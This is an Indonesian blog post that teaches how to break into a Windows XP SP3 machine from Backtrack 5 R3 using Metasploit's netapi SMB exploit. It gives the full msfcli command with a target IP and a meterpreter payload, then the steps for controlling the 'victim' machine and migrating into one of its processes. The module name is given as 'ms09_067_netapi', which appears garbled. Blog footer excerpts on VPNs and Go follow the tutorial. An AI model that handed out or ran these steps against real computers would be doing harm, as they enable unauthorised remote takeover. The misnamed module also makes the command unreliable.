Skip to main content

Exploit Windows XP with Exploit Netapi

hello!!!


sekarang saya mau kasih tutorial bagaimana untuk Exploit Windows XP SP3 dengan Backtrack 5 R3. untuk melakukan exploit, kita akan menggunakan tools penetration testing yang sudah terinstall default di Backtrack 5 R3 yaitu Metasploit Framework(MSF). dalam kerjanya MSF menggunakan module exploit yang sudah tersimpan dalam toolsnya. MSF mempunyai module Exploit yang sangat banyak, dalam kali saya akan menggunakan salah satu modulenya yaitu "windows/smb/ms09_067_netapi" yang sudah terkenal.  :a

tanpa banyak kata lagi. langsung saja ke langkah-langkahnya. :

1. buka terminal.
2. ketik msfcli windows/smb/ms09_067_netapi RHOST=192.168.88.93 PAYLOAD=windows/meterpreter/bind_tcp E
( saya asumsikan Kalian sudah mengetahui IP VIctim nya)
3. tunggu beberapa detik, jika berhasil akan muncul "meterpreter>".
(syarat untuk exploit berhasil adalah firewall dalam victim harus terbuka/nonaktif).
4. setelah masuk meterpreter. kalian terserah mau ngapain. karna komputer korban sudah kalian kendalikan. ^..^
5. untuk lebih leluasa kalian harus mendapatkan user privelage target. dengan cara "migrate" kedalam salah satu process yang ada.
6. caranya ketik "ps".
7. ketik "migrate 644 " angka 644 bisa anda ganti dengan angka yang terdapat pada PID salah satu processnya.
dalam tutorial ini saya sengaja tidak memberikan shortcut karna saya sudah menyiapakan video untuk pembelajaran anda dibawah ini :


Video Tutorial Exploit Netapi

sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

DB : TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa....  :b   :c :d :f :g
:h :i

Popular posts from this blog

OpenVPN Alternatif Solusi Menanggulangi Blokir dari KOMINFO

Sejak akhir juli 2022 kemaren indonesia di gegerkan dengan tindakan kominfo atas diblokirnya banyak platform digital karna tidak mendaftar PSE, terutama paypal dan plaform game (steam, epic game dll). keputusan ini semakin membuat netizen geram dikarenakan platform judi online malah disetujui untuk beroperasi karna sudah daftar PSE. Jujur menurut saya memang keputusan ini sejak awal saya dengar sudah mengada-ada karna sangat aneh memblokir semua platform digital yang jumlahnya tidak terhitung banyaknya dan hanya membolehkan akses platform yang sudah mendaftar yang jumlahnya hanya ratusan.  saya sebagai developer juga merasa aneh banget ini kebijakan apalagi platform development juga banyak yang di blacklist oleh kominfo seperti, github, gitlab, bitbucket, even website CDN pun di blacklist. astaga wkwkwk. anyway terlepas dari kebijakan konyol ini, saya mau berbagi tips cara agar tetep bisa mengakses semua platform tersebut tanpa ada halangan, yaitu dengan menggunakan VPN. banyak ban...

Playing with Hooks in Gorm #GolangDev

Pixabay Hello everyone, I would like to share some tricks in gorm, the Idea of this tricks is to execute a command or code statement in the middle of an ORM operation, if you ever know about trigger in the query language, then hooks is just kinda like that. Hooks could execute statement in some events such as: beforeCreate, beforeUpdate, afterCreate,  and afterUpdate . those event is similar as a trigger,  when the trigger is executed in DBMS layer, hooks are executed in the application layer. In my real case, my current company has different convention of naming database column, so when I try to implement ORM, a lot of columns such as created_at, updated_at and deleted_at can't be generated automatically. also if you have a custom UUID you could pass the value UUID generator into hooks before the insert is executed. for more detail let's jump into code : # Explanation Above code containing model struct, and several methods from gorm to serve model, TableName method used to d...

Variadic Function vs Slice Param Function in Golang #GolangDev

pixabay.com Hello everyone, good to see you again. I am gonna share about a simple thing in fundamental Golang, this article inspired by a QnA in a website and I think I will tell the answer more flexible and wider in my personal tutorial, so this is about differentiation between Variadic Function and Slice Param in Function. # Variadic Function Variadic function is an unique code, this code is enable us to passing a infinite params in one function, we know that we need to put parameters in function we need to put the space in there, for example : function(param1 int, param2 string), golang absolutely doing that thing too, seems like the other languages, but Variadic function is a something new, you could put many value in function and sapparated by comma, you maybe thing about passing array in parameters but this is something different, you dont need to put parenteses when you call the function, it just like you put regular parameters but have an infinite numbers.  fo...